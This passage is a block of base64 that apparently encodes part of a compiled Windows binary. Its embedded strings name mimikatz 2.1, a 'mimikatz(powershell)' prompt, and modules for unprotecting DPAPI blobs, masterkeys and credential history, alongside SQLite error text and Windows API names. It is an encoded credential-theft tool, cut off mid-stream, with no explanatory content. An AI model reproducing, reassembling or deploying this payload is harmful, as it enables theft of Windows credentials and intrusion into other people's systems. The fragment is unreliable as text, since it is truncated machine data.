QAdwBPAHUAdABWAGUAcgBzAGkAbwBuACAAbgBvAHQAIAB2AGEAbABpAGQAIAAoADAAeAAlADAAOAB4ACAALQAgACUAdQApAAoAAABTAGUAcgB2AGkAYwBlAHMAQQBjAHQAaQB2AGUAAAAAACUAdwBaAAAAJQAwADIAeAAAAAAAJQAwADIAeAAgAAAAMAB4ACUAMAAyAHgALAAgAAAAAABcAHgAJQAwADIAeAAAAAAACgBCAFkAVABFACAAZABhAHQAYQBbAF0AIAA9ACAAewAKAAkAAAAAAAkAAAAKAH0AOwAKAAAAAAAlAHMAIAAAACUAcwAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcwB0AHIAaQBuAGcAXwBkAGkAcwBwAGwAYQB5AFMASQBEACAAOwAgAEMAbwBuAHYAZQByAHQAUwBpAGQAVABvAFMAdAByAGkAbgBnAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFUAcwBlAHIAAAAAAEcAcgBvAHUAcAAAAEQAbwBtAGEAaQBuAAAAAABBAGwAaQBhAHMAAABXAGUAbABsAEsAbgBvAHcAbgBHAHIAbwB1AHAAAAAAAEQAZQBsAGUAdABlAGQAQQBjAGMAbwB1AG4AdAAAAAAASQBuAHYAYQBsAGkAZAAAAFUAbgBrAG4AbwB3AG4AAABDAG8AbQBwAHUAdABlAHIAAAAAAEwAYQBiAGUAbAAAAHUAbgBrACEAAAAAAFQAbwBrAGUAbgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AeABtAGwAXwBDAHIAZQBhAHQAZQBBAG4AZABJAG4AaQB0AEQATwBNACAAOwAgAEMAbwBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAOgAgADAAeAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwB4AG0AbABfAEwAbwBhAGQAWABNAEwARgBpAGwAZQAgADsAIABJAFgATQBMAEQATwBNAEQAbwBjAHUAbQBlAG4AdABfAGwAbwBhAGQAOgAgADAAeAAlADAAOAB4AAoAAAAAADAAAAAxAAAAJUg6JU06JVMAAAAAY3VycmVudF90aW1lAAAAACVZLSVtLSVkAAAAAGN1cnJlbnRfZGF0ZQAAAAAlWS0lbS0lZCAlSDolTTolUwAAAGN1cnJlbnRfdGltZXN0YW1wAAAAZmFpbGVkIHRvIGFsbG9jYXRlICV1IGJ5dGVzIG9mIG1lbW9yeQAAAGZhaWxlZCBtZW1vcnkgcmVzaXplICV1IHRvICV1IGJ5dGVzACUAAABOVUxMAAAAAChOVUxMKQAALgAAAAAAAAAAAAAAOTIyMzM3MjAzNjg1NDc3NTgwAABBUEkgY2FsbCB3aXRoICVzIGRhdGFiYXNlIGNvbm5lY3Rpb24gcG9pbnRlcgAAAAB1bm9wZW5lZAAAAABpbnZhbGlkAEFyZUZpbGVBcGlzQU5TSQBDaGFyTG93ZXJXAABDaGFyVXBwZXJXAABDbG9zZUhhbmRsZQBDcmVhdGVGaWxlQQBDcmVhdGVGaWxlVwBDcmVhdGVGaWxlTWFwcGluZ0EAAENyZWF0ZUZpbGVNYXBwaW5nVwAAQ3JlYXRlTXV0ZXhXAAAAAERlbGV0ZUZpbGVBAERlbGV0ZUZpbGVXAEZpbGVUaW1lVG9Mb2NhbEZpbGVUaW1lAEZpbGVUaW1lVG9TeXN0ZW1UaW1lAAAAAEZsdXNoRmlsZUJ1ZmZlcnMAAAAARm9ybWF0TWVzc2FnZUEAAEZvcm1hdE1lc3NhZ2VXAABGcmVlTGlicmFyeQBHZXRDdXJyZW50UHJvY2Vzc0lkAEdldERpc2tGcmVlU3BhY2VBAAAAR2V0RGlza0ZyZWVTcGFjZVcAAABHZXRGaWxlQXR0cmlidXRlc0EAAEdldEZpbGVBdHRyaWJ1dGVzVwAAR2V0RmlsZUF0dHJpYnV0ZXNFeFcAAAAAR2V0RmlsZVNpemUAR2V0RnVsbFBhdGhOYW1lQQAAAABHZXRGdWxsUGF0aE5hbWVXAAAAAEdldExhc3RFcnJvcgAAAABHZXRQcm9jQWRkcmVzc0EAR2V0U3lzdGVtSW5mbwAAAEdldFN5c3RlbVRpbWUAAABHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQBHZXRUZW1wUGF0aEEAAAAAR2V0VGVtcFBhdGhXAAAAAEdldFRpY2tDb3VudAAAAABHZXRWZXJzaW9uRXhBAAAAR2V0VmVyc2lvbkV4VwAAAEhlYXBBbGxvYwAAAEhlYXBDcmVhdGUAAEhlYXBEZXN0cm95AEhlYXBGcmVlAAAAAEhlYXBSZUFsbG9jAEhlYXBTaXplAAAAAEhlYXBWYWxpZGF0ZQAAAABIZWFwQ29tcGFjdABMb2FkTGlicmFyeUEAAAAATG9hZExpYnJhcnlXAAAAAExvY2FsRnJlZQAAAExvY2tGaWxlAAAAAExvY2tGaWxlRXgAAE1hcFZpZXdPZkZpbGUAAABNdWx0aUJ5dGVUb1dpZGVDaGFyAFF1ZXJ5UGVyZm9ybWFuY2VDb3VudGVyAFJlYWRGaWxlAAAAAFNldEVuZE9mRmlsZQAAAABTZXRGaWxlUG9pbnRlcgAAU2xlZXAAAABTeXN0ZW1UaW1lVG9GaWxlVGltZQAAAABVbmxvY2tGaWxlAABVbmxvY2tGaWxlRXgAAAAAVW5tYXBWaWV3T2ZGaWxlAFdpZGVDaGFyVG9NdWx0aUJ5dGUAV3JpdGVGaWxlAAAAQ3JlYXRlRXZlbnRFeFcAAFdhaXRGb3JTaW5nbGVPYmplY3QAV2FpdEZvclNpbmdsZU9iamVjdEV4AAAAU2V0RmlsZVBvaW50ZXJFeAAAAABHZXRGaWxlSW5mb3JtYXRpb25CeUhhbmRsZUV4AAAAAE1hcFZpZXdPZkZpbGVGcm9tQXBwAAAAAENyZWF0ZUZpbGUyAExvYWRQYWNrYWdlZExpYnJhcnkAR2V0VGlja0NvdW50NjQAAEdldE5hdGl2ZVN5c3RlbUluZm8AT3V0cHV0RGVidWdTdHJpbmdBAABPdXRwdXREZWJ1Z1N0cmluZ1cAAEdldFByb2Nlc3NIZWFwAABDcmVhdGVGaWxlTWFwcGluZ0Zyb21BcHAAAAAASW50ZXJsb2NrZWRDb21wYXJlRXhjaGFuZ2UAAFV1aWRDcmVhdGUAAFV1aWRDcmVhdGVTZXF1ZW50aWFsAAAAAEZsdXNoVmlld09mRmlsZQBPc0Vycm9yIDB4JWx4ICglbHUpACVzAABvc193aW4uYzolZDogKCVsdSkgJXMoJXMpIC0gJXMAAGRlbGF5ZWQgJWRtcyBmb3IgbG9jay9zaGFyaW5nIGNvbmZsaWN0IGF0IGxpbmUgJWQAAAB3aW5TZWVrRmlsZQB3aW5DbG9zZQAAAAB3aW5SZWFkAHdpbldyaXRlMQAAAHdpbldyaXRlMgAAAHdpblRydW5jYXRlMQAAAAB3aW5UcnVuY2F0ZTIAAAAAd2luU3luYzEAAAAAd2luU3luYzIAAAAAd2luRmlsZVNpemUAd2luVW5sb2NrUmVhZExvY2sAAAB3aW5VbmxvY2sAAAB3aW5Vbm1hcGZpbGUxAAAAd2luVW5tYXBmaWxlMgAAAHdpbk1hcGZpbGUxAHdpbk1hcGZpbGUyAGV0aWxxc18Ad2luR2V0VGVtcG5hbWUxAHdpbkdldFRlbXBuYW1lMgB3aW5HZXRUZW1wbmFtZTMAd2luR2V0VGVtcG5hbWU0AHdpbkdldFRlbXBuYW1lNQB3aW5PcGVuAHBzb3cAAAAAd2luRGVsZXRlAAAAd2luQWNjZXNzAAAAJXMlYyVzAAB3aW5GdWxsUGF0aG5hbWUxAAAAAHdpbkZ1bGxQYXRobmFtZTIAAAAAd2luRnVsbFBhdGhuYW1lMwAAAAB3aW5GdWxsUGF0aG5hbWU0AAAAAHdpbjMyAAAAd2luMzItbG9uZ3BhdGgAAHJlY292ZXJlZCAlZCBwYWdlcyBmcm9tICVzAAAtam91cm5hbAAAAABub2xvY2sAAGltbXV0YWJsZQAAAG91dCBvZiBtZW1vcnkAAAAlbGxkAAAAACUhLjE1ZwAALQAAACVzJXMAAAAAJXMtbWpYWFhYWFg5WFh6AE1KIGRlbGV0ZTogJXMAAABNSiBjb2xsaWRlOiAlcwAALW1qJTA2WDklMDJYAAAAAEFQSSBjYWxsZWQgd2l0aCBmaW5hbGl6ZWQgcHJlcGFyZWQgc3RhdGVtZW50AAAAAEFQSSBjYWxsZWQgd2l0aCBOVUxMIHByZXBhcmVkIHN0YXRlbWVudABzdHJpbmcgb3IgYmxvYiB0b28gYmlnAAB1bmFibGUgdG8gdXNlIGZ1bmN0aW9uICVzIGluIHRoZSByZXF1ZXN0ZWQgY29udGV4dAAAYmluZCBvbiBhIGJ1c3kgcHJlcGFyZWQgc3RhdGVtZW50OiBbJXNdAE5PVCBOVUxMAAAAAFVOSVFVRQAAQ0hFQ0sAAABGT1JFSUdOIEtFWQAlcyBjb25zdHJhaW50IGZhaWxlZAAAAAAlejogJXMAAGFib3J0IGF0ICVkIGluIFslc106ICVzAGNhbm5vdCBvcGVuIHNhdmVwb2ludCAtIFNRTCBzdGF0ZW1lbnRzIGluIHByb2dyZXNzAABubyBzdWNoIHNhdmVwb2ludDogJXMAAABjYW5ub3QgcmVsZWFzZSBzYXZlcG9pbnQgLSBTUUwgc3RhdGVtZW50cyBpbiBwcm9ncmVzcwAAAGNhbm5vdCBjb21taXQgdHJhbnNhY3Rpb24gLSBTUUwgc3RhdGVtZW50cyBpbiBwcm9ncmVzcwAAY2Fubm90IHN0YXJ0IGEgdHJhbnNhY3Rpb24gd2l0aGluIGEgdHJhbnNhY3Rpb24AY2Fubm90IHJvbGxiYWNrIC0gbm8gdHJhbnNhY3Rpb24gaXMgYWN0aXZlAABjYW5ub3QgY29tbWl0IC0gbm8gdHJhbnNhY3Rpb24gaXMgYWN0aXZlAAAAAGRhdGFiYXNlIHNjaGVtYSBoYXMgY2hhbmdlZABzcWxpdGVfbWFzdGVyAAAAAAAAAFNFTEVDVCBuYW1lLCByb290cGFnZSwgc3FsIEZST00gJyVxJy4lcyBXSEVSRSAlcyBPUkRFUiBCWSByb3dpZABzdGF0ZW1lbnQgYWJvcnRzIGF0ICVkOiBbJXNdICVzAG1pc3VzZSBvZiBhbGlhc2VkIGFnZ3JlZ2F0ZSAlcwAAbm8gc3VjaCBjb2x1bW4AAGFtYmlndW91cyBjb2x1bW4gbmFtZQAAACVzOiAlcy4lcy4lcwAAAAAlczogJXMuJXMAAAAlczogJXMAAHBhcnRpYWwgaW5kZXggV0hFUkUgY2xhdXNlcwBpbmRleCBleHByZXNzaW9ucwAAACVzIHByb2hpYml0ZWQgaW4gJXMAdGhlICIuIiBvcGVyYXRvcgAAAABmdW5jdGlvbnMAAABzZWNvbmQgYXJndW1lbnQgdG8gbGlrZWxpaG9vZCgpIG11c3QgYmUgYSBjb25zdGFudCBiZXR3ZWVuIDAuMCBhbmQgMS4wAABub24tZGV0ZXJtaW5pc3RpYyBmdW5jdGlvbnMAbWlzdXNlIG9mIGFnZ3JlZ2F0ZSBmdW5jdGlvbiAlLipzKCkAbm8gc3VjaCBmdW5jdGlvbjogJS4qcwAAd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cyB0byBmdW5jdGlvbiAlLipzKCkAAAAAc3VicXVlcmllcwAAcGFyYW1ldGVycwAAJXIgJXMgQlkgdGVybSBvdXQgb2YgcmFuZ2UgLSBzaG91bGQgYmUgYmV0d2VlbiAxIGFuZCAlZAB0b28gbWFueSB0ZXJtcyBpbiBPUkRFUiBCWSBjbGF1c2UAAABPUkRFUgAAACVyIE9SREVSIEJZIHRlcm0gZG9lcyBub3QgbWF0Y2ggYW55IGNvbHVtbiBpbiB0aGUgcmVzdWx0IHNldAAAAAB0b28gbWFueSB0ZXJtcyBpbiAlcyBCWSBjbGF1c2UAAGEgR1JPVVAgQlkgY2xhdXNlIGlzIHJlcXVpcmVkIGJlZm9yZSBIQVZJTkcAR1JPVVAAAABhZ2dyZWdhdGUgZnVuY3Rpb25zIGFyZSBub3QgYWxsb3dlZCBpbiB0aGUgR1JPVVAgQlkgY2xhdXNlAABFeHByZXNzaW9uIHRyZWUgaXMgdG9vIGxhcmdlIChtYXhpbXVtIGRlcHRoICVkKQB2YXJpYWJsZSBudW1iZXIgbXVzdCBiZSBiZXR3ZWVuID8xIGFuZCA/JWQAAHRvbyBtYW55IFNRTCB2YXJpYWJsZXMAAHRvbyBtYW55IGNvbHVtbnMgaW4gJXMAAF9ST1dJRF8AUk9XSUQAAABPSUQAb3ZlcnNpemVkIGludGVnZXI6ICVzJXMAbWlzdXNlIG9mIGFnZ3JlZ2F0ZTogJXMoKQAAAHVua25vd24gZnVuY3Rpb246ICVzKCkAACVzICVUIGNhbm5vdCByZWZlcmVuY2Ugb2JqZWN0cyBpbiBkYXRhYmFzZSAlcwAAAG5vIHN1Y2ggdGFibGUAAABjb3JydXB0IGRhdGFiYXNlAAAAAHVua25vd24gZGF0YWJhc2UgJVQAc3FsaXRlXwBvYmplY3QgbmFtZSByZXNlcnZlZCBmb3IgaW50ZXJuYWwgdXNlOiAlcwAAAHRhYmxlICVUIGFscmVhZHkgZXhpc3RzAHRoZXJlIGlzIGFscmVhZHkgYW4gaW5kZXggbmFtZWQgJXMAAHRvbyBtYW55IGNvbHVtbnMgb24gJXMAAGR1cGxpY2F0ZSBjb2x1bW4gbmFtZTogJXMAAABkZWZhdWx0IHZhbHVlIG9mIGNvbHVtbiBbJXNdIGlzIG5vdCBjb25zdGFudAAAAAB0YWJsZSAiJXMiIGhhcyBtb3JlIHRoYW4gb25lIHByaW1hcnkga2V5AAAAAElOVEVHRVIALAAAACkAAAAKICAALAogIAAAAAAKKQAAQ1JFQVRFIFRBQkxFIAAAACBURVhUAAAAIE5VTQAAAAAgSU5UAAAAACBSRUFMAAAAQVVUT0lOQ1JFTUVOVCBub3QgYWxsb3dlZCBvbiBXSVRIT1VUIFJPV0lEIHRhYmxlcwAAAFBSSU1BUlkgS0VZIG1pc3Npbmcgb24gdGFibGUgJXMAdGFibGUAAABUQUJMRQAAAENSRUFURSAlcyAlLipzAAAAAAAAVVBEQVRFICVRLiVzIFNFVCB0eXBlPSclcycsIG5hbWU9JVEsIHRibF9uYW1lPSVRLCByb290cGFnZT0jJWQsIHNxbD0lUSBXSEVSRSByb3dpZD0jJWQAAHRibF9uYW1lPSclcScgQU5EIHR5cGUhPSd0cmlnZ2VyJwAAAHNxbGl0ZV9zdGF0JWQAAABERUxFVEUgRlJPTSAlUS4lcyBXSEVSRSAlcz0lUQAAAERFTEVURSBGUk9NICVRLiVzIFdIRVJFIHRibF9uYW1lPSVRIGFuZCB0eXBlIT0ndHJpZ2dlcicAc3FsaXRlX3N0YXQAdGFibGUgJXMgbWF5IG5vdCBiZSBkcm9wcGVkAHRibABpbmRleAAAAGNhbm5vdCBjcmVhdGUgYSBURU1QIGluZGV4IG9uIG5vbi1URU1QIHRhYmxlICIlcyIAAABhbHRlcnRhYl8AAAB0YWJsZSAlcyBtYXkgbm90IGJlIGluZGV4ZWQAdGhlcmUgaXMgYWxyZWFkeSBhIHRhYmxlIG5hbWVkICVzAAAAaW5kZXggJXMgYWxyZWFkeSBleGlzdHMAc3FsaXRlX2F1dG9pbmRleF8lc18lZAAAZXhwcmVzc2lvbnMgcHJvaGliaXRlZCBpbiBQUklNQVJZIEtFWSBhbmQgVU5JUVVFIGNvbnN0cmFpbnRzAAAAAGNvbmZsaWN0aW5nIE9OIENPTkZMSUNUIGNsYXVzZXMgc3BlY2lmaWVkAAAAIFVOSVFVRQBDUkVBVEUlcyBJTkRFWCAlLipzAElOU0VSVCBJTlRPICVRLiVzIFZBTFVFUygnaW5kZXgnLCVRLCVRLCMlZCwlUSk7AG5hbWU9JyVxJyBBTkQgdHlwZT0naW5kZXgnAABubyBzdWNoIGluZGV4OiAlUwAAAGluZGV4IGFzc29jaWF0ZWQgd2l0aCBVTklRVUUgb3IgUFJJTUFSWSBLRVkgY29uc3RyYWludCBjYW5ub3QgYmUgZHJvcHBlZAAAAABERUxFVEUgRlJPTSAlUS4lcyBXSEVSRSBuYW1lPSVRIEFORCB0eXBlPSdpbmRleCcAAAAAaWR4AE9OAABVU0lORwAAAGEgSk9JTiBjbGF1c2UgaXMgcmVxdWlyZWQgYmVmb3JlICVzAGluZGV4ICclcScAACwgAAAlcy4lcwAAACVzLnJvd2lkAAAAAGR1cGxpY2F0ZSBXSVRIIHRhYmxlIG5hbWU6ICVzAAAAbm8gc3VjaCBjb2xsYXRpb24gc2VxdWVuY2U6ICVzAAB0YWJsZSAlcyBtYXkgbm90IGJlIG1vZGlmaWVkAAAAAHJvd3MgZGVsZXRlZAAAAABpbnRlZ2VyAHRleHQAAAAAcmVhbAAAAABibG9iAAAAAG51bGwAAAAAaW50ZWdlciBvdmVyZmxvdwAAAABMSUtFIG9yIEdMT0IgcGF0dGVybiB0b28gY29tcGxleAAAAABFU0NBUEUgZXhwcmVzc2lvbiBtdXN0IGJlIGEgc2luZ2xlIGNoYXJhY3RlcgAAAAAlIS4yMGUAACAAAABNQVRDSAAAAGxpa2UAAAAAZ2xvYgAAAAB1bmxpa2VseQAAAABsaWtlbGlob29kAABsaWtlbHkAAGx0cmltAAAAcnRyaW0AAAB0cmltAAAAAG1pbgBtYXgAdHlwZW9mAABsZW5ndGgAAGluc3RyAAAAcHJpbnRmAAB1bmljb2RlAGNoYXIAAAAAYWJzAHVwcGVyAAAAbG93ZXIAAABoZXgAaWZudWxsAAByYW5kb20AAHJhbmRvbWJsb2IAAG51bGxpZgAAc3FsaXRlX3ZlcnNpb24AAHNxbGl0ZV9zb3VyY2VfaWQAAAAAc3FsaXRlX2xvZwAAcXVvdGUAAABsYXN0X2luc2VydF9yb3dpZAAAAGNoYW5nZXMAdG90YWxfY2hhbmdlcwAAAHJlcGxhY2UAemVyb2Jsb2IAAAAAc3Vic3RyAABzdW0AdG90YWwAAABhdmcAY291bnQAAABncm91cF9jb25jYXQAAAAAY29hbGVzY2UAAAAAdGFibGUgJVMgaGFzIG5vIGNvbHVtbiBuYW1lZCAlcwB0YWJsZSAlUyBoYXMgJWQgY29sdW1ucyBidXQgJWQgdmFsdWVzIHdlcmUgc3VwcGxpZWQAJWQgdmFsdWVzIGZvciAlZCBjb2x1bW5zAAAAAHJvd3MgaW5zZXJ0ZWQAAABhdXRvbWF0aWMgZXh0ZW5zaW9uIGxvYWRpbmcgZmFpbGVkOiAlcwAAPwAAAG1hbGZvcm1lZCBkYXRhYmFzZSBzY2hlbWEgKCVzKQAAJXogLSAlcwBjcmVhdGUgAGludmFsaWQgcm9vdHBhZ2UAAAAAAAAAAENSRUFURSBUQUJMRSB4KHR5cGUgdGV4dCxuYW1lIHRleHQsdGJsX25hbWUgdGV4dCxyb290cGFnZSBpbnRlZ2VyLHNxbCB0ZXh0KQAAAAAAYXR0YWNoZWQgZGF0YWJhc2VzIG11c3QgdXNlIHRoZSBzYW1lIHRleHQgZW5jb2RpbmcgYXMgbWFpbiBkYXRhYmFzZQB1bnN1cHBvcnRlZCBmaWxlIGZvcm1hdABTRUxFQ1QgbmFtZSwgcm9vdHBhZ2UsIHNxbCBGUk9NICIldyIuJXMgT1JERVIgQlkgcm93aWQAAHN0YXRlbWVudCB0b28gbG9uZwAAdW5rbm93biBvciB1bnN1cHBvcnRlZCBqb2luIHR5cGU6ICVUICVUJXMlVABSSUdIVCBhbmQgRlVMTCBPVVRFUiBKT0lOcyBhcmUgbm90IGN1cnJlbnRseSBzdXBwb3J0ZWQAAGEgTkFUVVJBTCBqb2luIG1heSBub3QgaGF2ZSBhbiBPTiBvciBVU0lORyBjbGF1c2UAAABjYW5ub3QgaGF2ZSBib3RoIE9OIGFuZCBVU0lORyBjbGF1c2VzIGluIHRoZSBzYW1lIGpvaW4AAGNhbm5vdCBqb2luIHVzaW5nIGNvbHVtbiAlcyAtIGNvbHVtbiBub3QgcHJlc2VudCBpbiBib3RoIHRhYmxlcwBVTklPTiBBTEwAAABJTlRFUlNFQ1QAAABFWENFUFQAAFVOSU9OAAAAcm93aWQAAABjb2x1bW4lZAAAAAAlLip6OiV1AGFsbCBWQUxVRVMgbXVzdCBoYXZlIHRoZSBzYW1lIG51bWJlciBvZiB0ZXJtcwAAAAAAAABTRUxFQ1RzIHRvIHRoZSBsZWZ0IGFuZCByaWdodCBvZiAlcyBkbyBub3QgaGF2ZSB0aGUgc2FtZSBudW1iZXIgb2YgcmVzdWx0IGNvbHVtbnMAAABubyBzdWNoIGluZGV4OiAlcwAAACclcycgaXMgbm90IGEgZnVuY3Rpb24AAG11bHRpcGxlIHJlZmVyZW5jZXMgdG8gcmVjdXJzaXZlIHRhYmxlOiAlcwAAY2lyY3VsYXIgcmVmZXJlbmNlOiAlcwAAdGFibGUgJXMgaGFzICVkIHZhbHVlcyBmb3IgJWQgY29sdW1ucwAAAG11bHRpcGxlIHJlY3Vyc2l2ZSByZWZlcmVuY2VzOiAlcwAAAHJlY3Vyc2l2ZSByZWZlcmVuY2UgaW4gYSBzdWJxdWVyeTogJXMAAAB0b28gbWFueSByZWZlcmVuY2VzIHRvICIlcyI6IG1heCA2NTUzNQAAKgAAACVzLiVzLiVzAAAAAG5vIHN1Y2ggdGFibGU6ICVzAAAAbm8gdGFibGVzIHNwZWNpZmllZAB0b28gbWFueSBjb2x1bW5zIGluIHJlc3VsdCBzZXQAAERJU1RJTkNUIGFnZ3JlZ2F0ZXMgbXVzdCBoYXZlIGV4YWN0bHkgb25lIGFyZ3VtZW50AABubyBzdWNoIGNvbHVtbjogJXMAAHJvd3MgdXBkYXRlZAAAAABCSU5BUlkAAHRvbyBtYW55IGFyZ3VtZW50cyBvbiAlcygpIC0gbWF4ICVkAG5vIHF1ZXJ5IHNvbHV0aW9uAAAAYXQgbW9zdCAlZCB0YWJsZXMgaW4gYSBqb2luAHRvbyBtYW55IHRlcm1zIGluIGNvbXBvdW5kIFNFTEVDVAAAAHN5bnRheCBlcnJvciBhZnRlciBjb2x1bW4gbmFtZSAiJS4qcyIAAABwYXJzZXIgc3RhY2sgb3ZlcmZsb3cAAAB1bmtub3duIHRhYmxlIG9wdGlvbjogJS4qcwAAc2V0IGxpc3QAAAAAbmVhciAiJVQiOiBzeW50YXggZXJyb3IAdG9vIG1hbnkgYXJndW1lbnRzIG9uIGZ1bmN0aW9uICVUAAAAdW5yZWNvZ25pemVkIHRva2VuOiAiJVQiAAAAADIwMTYtMDUtMTggMTA6NTc6MzAgZmM0OWY1NTZlNDg5NzA1NjFkN2FiNmEyZjI0ZmRkN2Q5ZWI4MWZmMgAAAAB1bmFibGUgdG8gY2xvc2UgZHVlIHRvIHVuZmluYWxpemVkIHN0YXRlbWVudHMgb3IgdW5maW5pc2hlZCBiYWNrdXBzAG5vdCBhbiBlcnJvcgAAAABTUUwgbG9naWMgZXJyb3Igb3IgbWlzc2luZyBkYXRhYmFzZQBhY2Nlc3MgcGVybWlzc2lvbiBkZW5pZWQAAAAAY2FsbGJhY2sgcmVxdWVzdGVkIHF1ZXJ5IGFib3J0AABkYXRhYmFzZSBpcyBsb2NrZWQAAGRhdGFiYXNlIHRhYmxlIGlzIGxvY2tlZAAAAABhdHRlbXB0IHRvIHdyaXRlIGEgcmVhZG9ubHkgZGF0YWJhc2UAAAAAaW50ZXJydXB0ZWQAZGlzayBJL08gZXJyb3IAAGRhdGFiYXNlIGRpc2sgaW1hZ2UgaXMgbWFsZm9ybWVkAAAAAHVua25vd24gb3BlcmF0aW9uAAAAZGF0YWJhc2Ugb3IgZGlzayBpcyBmdWxsAAAAAHVuYWJsZSB0byBvcGVuIGRhdGFiYXNlIGZpbGUAAAAAbG9ja2luZyBwcm90b2NvbAAAAAB0YWJsZSBjb250YWlucyBubyBkYXRhAABjb25zdHJhaW50IGZhaWxlZAAAAGRhdGF0eXBlIG1pc21hdGNoAAAAbGlicmFyeSByb3V0aW5lIGNhbGxlZCBvdXQgb2Ygc2VxdWVuY2UAAGxhcmdlIGZpbGUgc3VwcG9ydCBpcyBkaXNhYmxlZAAAYXV0aG9yaXphdGlvbiBkZW5pZWQAAAAAYXV4aWxpYXJ5IGRhdGFiYXNlIGZvcm1hdCBlcnJvcgBiaW5kIG9yIGNvbHVtbiBpbmRleCBvdXQgb2YgcmFuZ2UAAABmaWxlIGlzIGVuY3J5cHRlZCBvciBpcyBub3QgYSBkYXRhYmFzZQAAdW5rbm93biBlcnJvcgAAAGFib3J0IGR1ZSB0byBST0xMQkFDSwAAAHVuYWJsZSB0byBkZWxldGUvbW9kaWZ5IHVzZXItZnVuY3Rpb24gZHVlIHRvIGFjdGl2ZSBzdGF0ZW1lbnRzAAAAAAAAdW5hYmxlIHRvIGRlbGV0ZS9tb2RpZnkgY29sbGF0aW9uIHNlcXVlbmNlIGR1ZSB0byBhY3RpdmUgc3RhdGVtZW50cwBsb2NhbGhvc3QAAABpbnZhbGlkIHVyaSBhdXRob3JpdHk6ICUuKnMAY2FjaGUAAABzaGFyZWQAAHByaXZhdGUAbW9kZQAAAABybwAAcncAAHJ3YwBtZW1vcnkAAGFjY2VzcwAAbm8gc3VjaCAlcyBtb2RlOiAlcwAlcyBtb2RlIG5vdCBhbGxvd2VkOiAlcwBubyBzdWNoIHZmczogJXMATk9DQVNFAABSVFJJTQAAAG1haW4AAAAAdGVtcAAAAAAlcyBhdCBsaW5lICVkIG9mIFslLjEwc10AAAAAZGF0YWJhc2UgY29ycnVwdGlvbgBtaXN1c2UAAGNhbm5vdCBvcGVuIGZpbGUAAAAACgAgACAALgAjACMAIwAjACMALgAgACAAIABtAGkAbQBpAGsAYQB0AHoAIAAyAC4AMQAgACgAeAA4ADYAKQAgAGIAdQBpAGwAdAAgAG8AbgAgAE4AbwB2ACAAMQAwACAAMgAwADEANgAgADEANQA6ADMAMAA6ADQAMAAKACAALgAjACMAIABeACAAIwAjAC4AIAAgACIAQQAgAEwAYQAgAFYAaQBlACwAIABBACAATAAnAEEAbQBvAHUAcgAiAAoAIAAjACMAIAAvACAAXAAgACMAIwAgACAALwAqACAAKgAgACoACgAgACMAIwAgAFwAIAAvACAAIwAjACAAIAAgAEIAZQBuAGoAYQBtAGkAbgAgAEQARQBMAFAAWQAgAGAAZwBlAG4AdABpAGwAawBpAHcAaQBgACAAKAAgAGIAZQBuAGoAYQBtAGkAbgBAAGcAZQBuAHQAaQBsAGsAaQB3AGkALgBjAG8AbQAgACkACgAgACcAIwAjACAAdgAgACMAIwAnACAAIAAgAGgAdAB0AHAAOgAvAC8AYgBsAG8AZwAuAGcAZQBuAHQAaQBsAGsAaQB3AGkALgBjAG8AbQAvAG0AaQBtAGkAawBhAHQAegAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAbwBlAC4AZQBvACkACgAgACAAJwAjACMAIwAjACMAJwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHcAaQB0AGgAIAAlADIAdQAgAG0AbwBkAHUAbABlAHMAIAAqACAAKgAgACoALwAKAAAACgBtAGkAbQBpAGsAYQB0AHoAKABwAG8AdwBlAHIAcwBoAGUAbABsACkAIAAjACAAJQBzAAoAAABFAFIAUgBPAFIAIABtAGkAbQBpAGsAYQB0AHoAXwBpAG4AaQB0AE8AcgBDAGwAZQBhAG4AIAA7ACAAQwBvAEkAbgBpAHQAaQBhAGwAaQB6AGUARQB4ADoAIAAlADAAOAB4AAoAAAAAAEkATgBJAFQAAAAAAEMATABFAEEATgAAAD4APgA+ACAAJQBzACAAbwBmACAAJwAlAHMAJwAgAG0AbwBkAHUAbABlACAAZgBhAGkAbABlAGQAIAA6ACAAJQAwADgAeAAKAAAAAAA6ADoAAAAAAAAAAABFAFIAUgBPAFIAIABtAGkAbQBpAGsAYQB0AHoAXwBkAG8ATABvAGMAYQBsACAAOwAgACIAJQBzACIAIABtAG8AZAB1AGwAZQAgAG4AbwB0ACAAZgBvAHUAbgBkACAAIQAKAAAACgAlADEANgBzAAAAIAAgAC0AIAAgACUAcwAAACAAIABbACUAcwBdAAAAAABFAFIAUgBPAFIAIABtAGkAbQBpAGsAYQB0AHoAXwBkAG8ATABvAGMAYQBsACAAOwAgACIAJQBzACIAIABjAG8AbQBtAGEAbgBkACAAbwBmACAAIgAlAHMAIgAgAG0AbwBkAHUAbABlACAAbgBvAHQAIABmAG8AdQBuAGQAIAAhAAoAAAAKAE0AbwBkAHUAbABlACAAOgAJACUAcwAAAAAACgBGAHUAbABsACAAbgBhAG0AZQAgADoACQAlAHMAAAAKAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgADoACQAlAHMAAABiAGwAbwBiAAAAAABEAGUAcwBjAHIAaQBiAGUAIABhACAARABQAEEAUABJACAAYgBsAG8AYgAsACAAdQBuAHAAcgBvAHQAZQBjAHQAIABpAHQAIAB3AGkAdABoACAAQQBQAEkAIABvAHIAIABNAGEAcwB0AGUAcgBrAGUAeQAAAHAAcgBvAHQAZQBjAHQAAAAAAAAAUAByAG8AdABlAGMAdAAgAGEAIABkAGEAdABhACAAdgBpAGEAIABhACAARABQAEEAUABJACAAYwBhAGwAbAAAAG0AYQBzAHQAZQByAGsAZQB5AAAAAAAAAEQAZQBzAGMAcgBpAGIAZQAgAGEAIABNAGEAcwB0AGUAcgBrAGUAeQAgAGYAaQBsAGUALAAgAHUAbgBwAHIAbwB0AGUAYwB0ACAAZQBhAGMAaAAgAE0AYQBzAHQAZQByAGsAZQB5ACAAKABrAGUAeQAgAGQAZQBwAGUAbgBkAGkAbgBnACkAAABjAHIAZQBkAGgAaQBzAHQAAAAAAEQAZQBzAGMAcgBpAGIAZQAgAGEAIABDAHIAZQBkAGgAaQBzAH